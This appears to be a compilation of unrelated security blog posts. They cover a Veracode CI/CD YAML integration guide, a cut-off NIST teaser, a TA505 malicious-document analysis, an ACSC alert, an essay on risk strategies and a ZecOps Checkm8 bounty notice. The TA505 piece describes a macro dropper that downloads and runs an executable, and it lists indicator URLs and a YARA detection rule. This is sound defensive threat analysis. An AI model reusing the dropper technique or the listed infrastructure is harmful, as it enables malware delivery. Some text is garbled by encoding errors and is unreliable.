YAML scripting is frequently used to simplify configuration management of CI/CD tools. This blog post shows how YAML scripts for build tools like Circle CI, Concourse CI, GitLab, and Travis can be edited in order to create integrations with the Veracode Platform. Integrating Veracode AppSec solutions into CI/CD pipelines enables developers to embed remediation of software vulnerabilities directly into their SDLC workflows, creating a more efficient process for building secure applications. You can also extend the script template proposed in this blog to integrate Veracode AppSec scanning with almost any YAML-configured build tool. ツ?

Step One: Environment Requirements

The first step is to confirm that your selected CI tool supports YAML-based pipeline definitions, where we assume that you are spinning up Docker images to run your CI/CD workflows. Your Docker images can run either on Java or .Net. Scripts included in this article are targeted only for Java, and you will need to confirm this step before moving on to the next one.

Step Two: Setting Up Your YAML File

The second step is to locate the YAML configuration file, which for many CI tools is labeled as config.yml. The basic syntax is the same for most build tools, with some minor variations. The links below contain configuration file scripts for Circle CI, Concourse CI, GitLab, and Travis, which you can also use as examples for adjusting methods of config files for other build tools.

Step Three: Downloading the Java API Wrapper

The next step requires downloading the Java API wrapper, which can be done by using the script below.

 # grab the Veracode agent
run:
	name: "Get the Veracode agent"
	command: |
	wget https://repo1.maven.org/maven2/com/veracode/vosp/api/wrappers/vosp-api-wrappers-java/19.2.5.6/vosp-api-wrappers-java-19.2.5.6.jar -O VeracodeJavaAPI.jar

Step Four: Adding Veracode Scan Attributes to Build Pipelines

The final step requires entering in the script all the information required to interact with Veracode APIs, including data attributes like users??? access credentials, application name, build tool version number, etc. Veracode has created a rich library of APIs that provide numerous options for interacting with the Veracode Platform, and that enable customers and partners to create their own integrations. Information on Veracode APIs is available in the Veracode Help Center.

The script listed below demonstrates how to add attributes to the Circle CI YAML configuration file, so that the script can run the uploadandscan API, which will enable application uploading from Circle CI to the Veracode Platform, and trigger the Platform to run the application scan.

run:
	     name: "Upload to Veracode"
	     command: java -jar VeracodeJavaAPI.jar 
	       -vid $VERACODE_API_ID 
	       -vkey $VERACODE_API_KEY 
	       -action uploadandscan 
	       -appname $VERACODE_APP_NAME 
	       -createprofile false 
	       -version CircleCI-$CIRCLE_BUILD_NUM 
	       -filepath upload.zip

In this example, we have defined:

Name ??? YAML workflow name defined in this script

Command ??? command to run Veracode API. Details on downloading API jar are already provided in the previous step

-vid $VERACODE_API_ID - user???s Veracode ID access credential

--vkey $VERACODE_API_KEY ??? user???s Veracode Key access credential

-action uploadandscan ??? name of Veracode API invoked by this script

$VERACODE_APP_NAME ??? name of customer application targeted for uploading and scanning by the Platform. This application name should be defined identically to the way that it is defined in the application profile on the Veracode Platform

-createprofile false ??? is a Boolean that defines whether application profile should be automatically created if the veracode_app_name does not find a match for an existing application profile. ツ?

  • If defined as true, application profile will be created automatically if no app_name match is found, and upload and scan steps will continue
  • If defined as false, application profile will not be created, with no further actions for upload and scan

-version CircleCI - $CIRCLE_BUILD_NUM ??? version number of the Circle CI tool that the customer is using to run this integration

-filepath upload.zip ??? location where the application file resides prior to interacting with the Veracode API

With these four steps, Veracode scanning is now integrated into a new CI/CD pipeline.

Integrating application security scanning directly into your build tools enables developers to incorporate security scans directly into their SDLC cycles. Finding software vulnerabilities earlier in the development cycle allows for simpler remediation and more efficient issue resolution, enabling Veracode customers to build more secure software, without compromising on development deadlines.

For additional information on Veracode Integrations, please visit our integrations page.

To Measure Bias in Data, NIST Initiates ‘Fair Ranking’ Research Effort

A new research effort at the National Institute of Standards and Technology (NIST) aims to address a pervasive issue in our data-driven society: a lack of fairness that sometimes turns up in the answers we get from information retrieval software. Software of this type is everywhere, from popular search engines to less-known algorithms that help specialists comb through databases. This software usually incorporates forms of artificial intelligence that help it learn to make better decisions over time. But it bases these decisions on the data it receives, and if that data is biased in some way

TA-505 Cybercrime on System Integrator Companies

Introduction

During a normal monitoring activity, one of the detection tools hits a suspicious email coming from the validtree.com domain. The domain was protected by a Panama company to hide its real registrant and this condition rang a warning bell on the suspected email so that it required a manual analysis in order to investigate its attachment.
Digging into this malicious artifact opened up to a possible raising interest of the infamous TA505 in System Integrator Companies (companies in which have been found that threat).

Technical Analysis

During the past few weeks suspicious emails coming from the validtree.com domain was detected: they were addressing System Integration Companies. The domain validtree.com is registered through namecheap.com on 2017-12-07T15:55:27Z but recently renewed on 2019-10-16T05:35:18Z. The registrant is protected by a Panama company named WhoisGuard which hides the original registrant name. Currently the domain points to 95.211.151.230 which is an IP address assigned to LeaseWeb a VPS hosting provider located in Netherland, Europe. Attached to the email a suspicious word document was waiting to be opened from the victim.

Hash7ebd1d6fa8c21b0d0c015475ab8c7225f949c13a33d0a39b8c069072a4281392
ThreatMacro Dropper
Brief DescriptionDocument Dropper
Ssdeep384:nFZ5ZtDGGkLmTUrioRPATRn633Dmej0SnJzbmiVywP0jKk:n1oqwT2J633DVgiVy25

By opening the word document the victim displays the following text (Image1). The document tempts the victim in enabling the macro functionality in order to re-encode the document with readable charsets by translating the current encoding charset to the local readable one.

Image1: Word Document Content

A transparent Microsoft-word-shape placed on top of the encoded text avoids the victim to interact with the unreadable text. That document holds two VBA-Macro functions which were identified as a romantic AutoOpen and an additional one named HeadrFooterProperty. Interesting to note that the document had no evidences on VT (during the analysis time), so it could be a revamped threat or a totally new one! The two Macros decoded a Javascript payload acting as a drop and execute by using a well-known strategy as described in: “Frequent VBA Macros used in Office Malware”. The following image shows the decoding process. A first round of obfuscation technique was adopted by the attacker in order to make harder the analyst’s decoding process. That stage implements an obfuscated Javascript embedded code which decodes, by using a XOR with key=11, a third Javascript stage acting as drop and execute on 66.133.129.5 resource. That IP is assigned to Frontier Communications Solutions: a NY based company.

Image2: Deobfuscation Steps from obfuscated VBA to Clear “evaled” javascript

It was nice to read the obfuscated code since the variable names where actually thematically chosen per function. For example the theseus function is obfuscated with “divine terms”, one of my favorite was actually the following conditional branch: If pastorale / quetzalcoatl < 57 Then ..., which actually was always true ! 😀 (quetzalcoatl is “feathered serpent” a aztech god, while pastorale is an evocative composition often used for cite or pray to gods). Another fun fact was in the variable name the attacker attributed to the string “JavaScript”: emotionless. In particular the attacker refers to JavaScript through the object “emotionless.Language”. Funny isn’t it ?
The final javascript downloader aims to drop a file from http://66[.133[.129[.5/~chuckgilbert/09u8h76f/65fg67n placing it into the system temporary directory and naming it nanagrams.exe. Finally it runs that windows PE file on the victim machine.
During the analysis-time the dropping URL was not working, indeed the dropping URL contains a surprise.php. Actually, a misconfiguration of the dropping website allowed us to visualize its source code. As shown in the following image (Image3) the page tracks the visitors through an iframe pointing to: http[://tehnofaq[.work and through a random loop redirects the downloader script to a different dropping URL.

Image3: Redirecting script

Building a re-directors or proxy chains is quite useful for attackers in order to evade Intrusion Prevention Systems and/or protections infrastructures based upon IPs or DNS blocks. In such a case the redirection script pushes to one of the following domains by introducing the HTML meta “refresh” tag, pointing the browser URL to a random choice between 4 different entries belonging to the following two domains:

  • http[://com-kl96.net
  • http[://com-mk84.net

Possible Link with TA-505

The used infrastructure, by analyzing the dropping urls, looks like an old infrastructure used for propagating Ransomware. Indeed it’s possible to observe many analogies with the following dropping urls belonging to a previously utilized Ransomware threat:

  • http[://66.133.129.5/~kvas/
  • http[://66.133.129.5/~nsmarc1166/
  • http[://frontiernet.net/~jherbaugh/

The infrastructure used in the attacks suggests the involvement of the cybercrime group TA505. The TA505 group, that is known to have operated both the Dridex and Locky malware families, continues to make small changes to its operations. TA505 hacking group has been active since 2014 focusing on Retail and banking sectors.
Recently security experts at Proofpoint observed the notorious TA505 cybercrime group that has been using a new RAT dubbed SDBbot, it is a backdoor that is delivered via a new downloader dubbed Get2 that was written in C++. The dropper was also used to distribute other payloads, including FlawedGrace, FlawedAmmyy, and Snatch. The used URLs in the attack have the same pattern associated with the notorious crime gang, the researchers also pointed out that the IP addresses (i.e. 66.133.129.5) observed in the attacks were involved in previous campaigns delivering Locky and Dridex malware.


Unfortunately, I was not able to analyse the final payload of the attack chain that was still not available at the time of the analysis. The final stage malware analysis is essential to attempt to attribute the attack to a specific threat actor. The evidence and artifacts collected in this analysis suggest two possible scenarios:

  • TA505 group is expanding his operations, but it still controlling an infrastructure involved in previous attacks across the years. The threat actors still leverage this infrastructure for “hit and run” operations or to test new attacks technique and tools avoiding to expose their actual infrastructure. Both options are interesting, but only the knowledge of the final stage malware could give us a wider view on the current operations of the group.
  • Another threat actor, likely financially motivated, is leveraging the same infrastructure used by TA505 and used it to make it harder the analysis and the attribution of the attacks.

Conclusion

An interesting Maldoc acting as drop-and-execute was identified and spotted in the wild targeting System Integrator based in Europe . From the described analysis we attempted to identify the attacker by observing he was exploiting an old infrastructure behind 66.133.129.5 as a dropping websites.
During the analysis time the attack-path was still incomplete and the attacker didn’t weaponize the dropping websites yet, but the spread document is able to grab content from specific URLs and to run directly on the victim machine.
The used strings for obfuscating the dropper were actually fun and “thematic”. For example strings like “madrillus”, “vulcano”, “pastorale”, “quetzalcoatl” remind an ancient culture (mandrillus, vulcano and quetzalcoatl) while objects like “emotionless” assigned to a specific programming language reminds a witty attacker.

Since no final stage was obtained so far, attribution is quite hard, but TTPs suggest a TA-505 attacker, due to the collected artifacts and to the analyzed URLs.

Indicator of Compromise (IoC)

Hash: 7ebd1d6fa8c21b0d0c015475ab8c7225f949c13a33d0a39b8c069072a4281392
URL:
http://66[.133[.129[.5/~chuckgilbert/09u8h76f/65fg67n
http[://tehnofaq[.work
http[://com-kl96.net/new.php?a=269321&c=wl_con&s=702w’
http[://com-mk84.net/new.php?a=269321&c=wl_con&s=702w’
http[://com-kl96.net/new.php?a=269321&c=job&s=702j’
http[://com-mk84.net/new.php?a=269321&c=job&s=702j’

Yara Rules

rule TA505_Target_SystemIntegrators_sample {
   meta:
      description = "TA505 target System Integrators"
      date = "2019-11-11"
      hash1 = "7ebd1d6fa8c21b0d0c015475ab8c7225f949c13a33d0a39b8c069072a4281392"
   strings:
      $x1 = "*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation" fullword wide
      $s2 = "*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.3#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE11\\MSO.DLL#Microsoft " wide
      $s3 = "'%TEMP%\\conjunctiva.exe'" fullword ascii
      $s4 = "rams.exe" fullword ascii
      $s5 = "*\\G{000204EF-0000-0000-C000-000000000046}#4.0#9#C:\\PROGRA~1\\COMMON~1\\MICROS~1\\VBA\\VBA6\\VBE6.DLL#Visual Basic For Applicat" wide
      $s6 = "WScript.Shell" fullword ascii
      $s7 = "\\nanagrams.exe" fullword ascii
      $s8 = "*\\G{00020905-0000-0000-C000-000000000046}#8.3#0#C:\\Program Files\\Microsoftvolcano" fullword wide
      $s9 = " Office\\OFFICE11\\MSWORD.OLB#Microsoft Word 11.0 Object Library" fullword wide
      $s10 = "PROJECT.THISDOCUMENT.AUTOOPEN" fullword wide
      $s11 = "5\\x64\\x7b\\x6e\\x65\\x23\\x29\\x4c\\x4e\\x5f\\x29\\x27\\x7e\\x79\\x67\\x27\\x6d\\x6a\\x67\\x78\\x6e\\x22\\x30\\x2b\\x" fullword ascii
      $s12 = "Project.ThisDocument.AutoOpen" fullword wide
      $s13 = "mistyeyed" fullword ascii
      $s14 = "(xor_key ^ plain_str.charCodeAt(i)); return xored_str;}" fullword ascii
      $s15 = "IVa.ExE'); StaRT " fullword ascii
      $s16 = "65\\x2b\\x73\\x63\\x79\\x25\\x79\\x6e\\x78\\x7b\\x64\\x65\\x78\\x6e\\x49\\x64\\x6f\\x72\\x30\\x2b" fullword ascii
      $s17 = "costaTEMP%instantaneous" fullword ascii
      $s18 = "wdSeekCurrentPageHeader$$0" fullword ascii
      $s19 = "TEMP%in " fullword ascii
      $s20 = "conjecturalitygclamydospore" fullword ascii
   condition:
      uint16(0) == 0xcfd0 and filesize < 100KB and
      1 of ($x*) and 4 of them
}

National Cyber Security Committee urges vigilance as two concerning cyber security threats are in the wild

UPDATE: As at 12th November 2019 the CIMA level returned to Level 5 - Normal Conditions. The Australian Signals Directorate’s Australian Cyber Security Centre (ACSC), with its state and territory partners, is continuing to respond to the widespread malware campaign known as Emotet while responding to reports that hackers are exploiting the BlueKeep vulnerability to mine cryptocurrency. The Cyber Incident Management Arrangements (CIMA) remain activated, however the alert level has been downgraded to Level 4 – ‘Lean Forward’.

Seven Security Strategies, Summarized

This is the sort of story that starts as a comment on Twitter, then becomes a blog post when I realize I can't fit all the ideas into one or two Tweets. (You know how much I hate Tweet threads, and how I encourage everyone to capture deep thoughts in blog posts!)

In the interest of capturing the thought, and not in the interest of thinking too deeply or comprehensively (at least right now), I offer seven security strategies, summarized.

When I mention the risk equation, I'm talking about the idea that one can conceptually image the risk of some negative event using this "formula": Risk (of something) is the product of some measurements of Vulnerability X Threat X Asset Value, or R = V x T x A.

  1. Denial and/or ignorance. This strategy assumes the risk due to loss is low, because those managing the risk assume that one or more of the elements of the risk equation are zero or almost zero, or they are apathetic to the cost.
  2. Loss acceptance. This strategy may assume the risk due to loss is low, or more likely those managing the risk assume that the cost of risk realization is low. In other words, incidents will occur, but the cost of the incident is acceptable to the organization.
  3. Loss transferal. This strategy may also assume the risk due to loss is low, but in contrast with risk acceptance, the organization believes it can buy an insurance policy which will cover the cost of an incident, and the cost of the policy is cheaper than alternative strategies.
  4. Vulnerability elimination. This strategy focuses on driving the vulnerability element of the risk equation to zero or almost zero, through secure coding, proper configuration, patching, and similar methods.
  5. Threat elimination. This strategy focuses on driving the threat element of the risk equation to zero or almost zero, through deterrence, dissuasion, co-option, bribery, conversion, incarceration, incapacitation, or other methods that change the intent and/or capabilities of threat actors. 
  6. Asset value elimination. This strategy focuses on driving the threat element of the risk equation to zero or almost zero, through minimizing data or resources that might be valued by adversaries.
  7. Interdiction. This is a hybrid strategy which welcomes contributions from vulnerability elimination, primarily, but is open to assistance from loss transferal, threat elimination, and asset value elimination. Interdiction assumes that prevention eventually fails, but that security teams can detect and respond to incidents post-compromise and pre-breach. In other words, some classes of intruders will indeed compromise an organization, but it is possible to detect and respond to the attack before the adversary completes his mission.
As you might expect, I am most closely associated with the interdiction strategy. 

I believe the denial and/or ignorance and loss acceptance strategies are irresponsible.

I believe the loss transferal strategy continues to gain momentum with the growth of cybersecurity breach insurance policies. 

I believe the vulnerability elimination strategy is important but ultimately, on its own, ineffective and historically shown to be impossible. When used in concert with other strategies, it is absolutely helpful.

I believe the threat elimination strategy is generally beyond the scope of private organizations. As the state retains the monopoly on the use of force, usually only law enforcement, military, and sometimes intelligence agencies can truly eliminate or mitigate threats. (Threats are not vulnerabilities.)

I believe asset value elimination is powerful but has not gained the ground I would like to see. This is my "If you can’t protect it, don’t collect it" message. The limitation here is obviously one's raw computing elements. If one were to magically strip down every computing asset into basic operating systems on hardware or cloud infrastructure, the fact that those assets exist and are networked means that any adversary can abuse them for mining cryptocurrencies, or as infrastructure for intrusions, or for any other uses of raw computing power.

Please notice that none of the strategies listed tools, techniques, tactics, or operations. Those are important but below the level of strategy in the conflict hierarchy. I may have more to say on this in the future. 

Checkm8 Implications on iOS DFIR, TFP0, #FreeTheSandbox, Apple, and Google

Checkm8 Implications on iOS DFIR, TFP0, #FreeTheSandbox, Apple, and Google

Thanks to Checkm8 – a bootrom vulnerability that exist on most iPhones/iPads (<A12), a generic method to bypass the iOS sandbox restrictions will be made public within days/weeks for all previous and future versions of iOS! An upcoming release of a generic capability to extract the filesystem of a suspected iOS devices will help to boost digital forensics investigations.

Which devices are vulnerable: almost every iPhone/iPad until iPhone X. 
Which devices are not vulnerable? iPhone Xs/Xr and 11/11Pro.

Notably, the release of checkm8 will help to enhance Digital Forensics and Incident Response (DFIR) on iPhone X (and all previous models) and make it easier to perform deep investigations compared to the newer models such as iPhone Xs / Xr / 11. Whilst iPhones running on A12+ chipsets benefit from a Pointer Authentication Code (PAC) security mitigation, which makes exploitation significantly harder, the inspectability of such devices remain to be a major challenge and is crucial for successful DFIR investigations when initial suspicion is raised.  

Furthermore, this vulnerability, amongst other capabilities, allows iPhone owners to modify boot arguments which, for example, can enable users to have an even safer iOS version than vanilla iOS.

When ZecOps started the #FreeTheSandbox initiative, we did not foresee a release of a bootrom exploit covering the latest production devices. Thanks to @axi0mX bootrom exploits have become a reality and changed the game. A number of experienced and reputable researchers (such as @qwertyoruiopz, @siguza and many other fine individuals) worked tirelessly to make use of checkm8 in order to set the iOS sandbox free (a.k.a Checkra1n). 

Soon it will be released publicly.

Implications to Apple & Google:

Since almost every iOS device is now susceptible to jailbreaking without requiring new exploit chains or bypassing mitigation techniques, it is time for Apple to rethink its sandboxing strategy and allow iOS users to freely inspect their devices including A12 and A13 devices without the need of a Local Privilege Escalation (LPE) exploit. 

Device vendors, such as Apple and Google, will soon realize that Checkm8-style unpatchable vulnerabilities are inevitable. Restricting sandbox policy against device owners does not make sense and only benefit attackers that oftentimes leverage the sandbox to avoid detection.

Notable case was Google Project Zero discovery of 14 vulnerabilities leveraged in-the-wild against any iOS visitors of certain websites whilst attackers didn’t even try to hide and executed their payloads from a tmp folder. Following Checkm8, many researchers will take a closer look at bootrom vulnerabilities. Since boot level vulnerabilities are unavoidable, and we would like to encourage Google & Apple to open-up Android/iOS for inspectability with the consent of end-users. This will enable to perform complete DFIR investigations without flashing a new image, slowing down time-critical investigations or tampering with attacks’ evidence. 

Should device-vendors decide to consider this, ZecOps will collaborate with each vendor to enumerate key things that would be important to enable mobile DFIR investigations. Furthermore, enabling users to inspect their devices does not increase device issues, on the contrary, organizations that permit CYOD policy would prefer devices that are inspectible, especially in the Defense / Government sectors.  

Update to ZecOps Task-For-Pwn-0 Project

Following this release, ZecOps decided that we should focus more on bootrom vulnerabilities for both iOS and Android. 

  • iOS Bootrom vulnerabilities for A12/A13: We’re willing to offer up to $250,000 bounties for A12 and A13 bootrom vulnerabilities. 
  • Android support: With this blog post, we are happy to announce that we are opening up our program for Android devices too. As a starting point, we’ll only examine Android boot-level bugs.
  • Existing LPEs on iOS 13+: Until we receive bootrom submissions, on iOS we’ll focus exclusively on LPEs for A12/A13 devices.

Other TFP0 Term & Updates

Disclosures / (non)-exclusivity / and other terms will be discussed with researchers at the time of the submission. Price for the bounty will be determined following an agreement on the terms.

Submissions

Send submissions to task_for_pwn@zecops.com. The public key is available at the bottom of this post.

It has been almost two months since we launched the program and so far it has been a great success, since it helps our DFIR investigations globally! More updates to this program will be provided soon, as it is continuously evolving. 

We would like to thank everyone who supports #FreeTheSandbox initiative and hope that soon we will all be allowed to inspect devices we purchased without the need to break into them.

If you wish to analyze suspected devices – please contact us here DFIR_inspections@zecops.com

The ZecOps TFP0 Team

Bonus

If you read all the way till here – here’s a bonus:
To receive #FreeTheSandbox stickers delivered to you, fill this form

task_for_pwn@zecops.com public key below:

-----BEGIN PGP PUBLIC KEY BLOCK-----

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
nuIgwms=
=WWrF
-----END PGP PUBLIC KEY BLOCK-----